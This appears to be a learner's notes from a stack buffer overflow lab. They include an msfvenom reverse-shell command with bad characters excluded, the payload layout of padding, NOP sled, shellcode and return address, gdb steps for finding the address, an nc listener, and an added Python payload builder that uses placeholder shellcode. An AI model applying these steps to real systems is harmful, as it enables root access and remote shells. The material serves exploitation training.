New shellcode & Return Address

Generating the shellcode without the bad characters

  • msfvenom -p linux/x86/shell_reverse_tcp lhost=<LHOST> lport=<LPORT> --format c --arch x86 --platform linux --bad-chars "<chars>" --out <filename>
  • msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode
    • msfvenom reports a payload size of 95 bytes

MATH again

  • 'A' * (1036 - 95 - 124) = 'A' * 817, i.e. the 1036-byte overflow minus the 95-byte shellcode minus a 124-byte NOP sled
  • 'shellcode'
  • 'B' * 4
    • Not sure how we landed at 124
  • run $(python -c "print 'A'*817 + '\x90'*124 + '_SHELLCODE_' + 'B'*4") (where _SHELLCODE_ stands for the 95 generated bytes)

Calculating the Return Address

  • Do this only after the bad characters have been eliminated.
  • Run x/2000xb $esp+550 in gdb again
  • now find the address with the NOP sleds
  • Take one of those addresses and replace the 'B'*4 with it
  • Enter it in little-endian byte order (reversed)
  • Start a nc listener on port 31337 that we entered in the shellcode
  • Start the exploit with run $(python -c "print buffer + nop + shellcode + return_address")
  • Now, while exploiting the program, DON'T run it under gdb; that will not give you the root shell.
  • Run the program normally with our payload to get root.
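As an added worked example (not from the original notes), the following Python checks the layout arithmetic above (1036 - 95 - 124 = 817), verifies that neither the shellcode nor the return address contains any of the bad characters, and packs the address in little-endian order. The 95-byte shellcode and the return address are constructed placeholders, not values from the lab.

```python
import struct

# Constants taken from the notes: overflow length, NOP sled length, bad characters.
BUFFER_LEN = 1036
SLED_LEN = 124
BAD_CHARS = b"\x00\x09\x0a\x20"

# Constructed stand-in for the 95-byte msfvenom output (int3 bytes, not a real payload).
DEMO_SHELLCODE = b"\xcc" * 95


def find_bad_chars(data: bytes, bad_chars: bytes = BAD_CHARS) -> list:
    """Return (offset, byte) pairs for every bad character that appears in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad_chars]


def padding_len(shellcode: bytes, buffer_len: int = BUFFER_LEN, sled_len: int = SLED_LEN) -> int:
    """Length of the 'A' filler: buffer_len - len(shellcode) - sled_len."""
    pad = buffer_len - len(shellcode) - sled_len
    if pad < 0:
        raise ValueError("shellcode plus NOP sled does not fit in the buffer")
    return pad


def build_payload(shellcode: bytes, ret_addr: int,
                  buffer_len: int = BUFFER_LEN, sled_len: int = SLED_LEN) -> bytes:
    """Assemble filler + NOP sled + shellcode + return address, enforcing the constraints."""
    bad = find_bad_chars(shellcode)
    if bad:
        raise ValueError(f"shellcode contains bad characters at {bad}")
    ret = struct.pack("<I", ret_addr)  # little-endian, replaces the 'B'*4 marker
    bad = find_bad_chars(ret)
    if bad:
        raise ValueError(f"return address {ret_addr:#x} contains bad characters at {bad}")
    payload = b"A" * padding_len(shellcode, buffer_len, sled_len) + b"\x90" * sled_len + shellcode + ret
    # The overflow fills the buffer exactly and the 4 trailing bytes overwrite the saved return address.
    assert len(payload) == buffer_len + 4
    return payload


if __name__ == "__main__":
    # 0xbffff3a0 is a constructed example address, not one observed in the lab.
    p = build_payload(DEMO_SHELLCODE, 0xBFFFF3A0)
    print(f"payload length {len(p)}, filler {padding_len(DEMO_SHELLCODE)}, tail {p[-4:].hex()}")
```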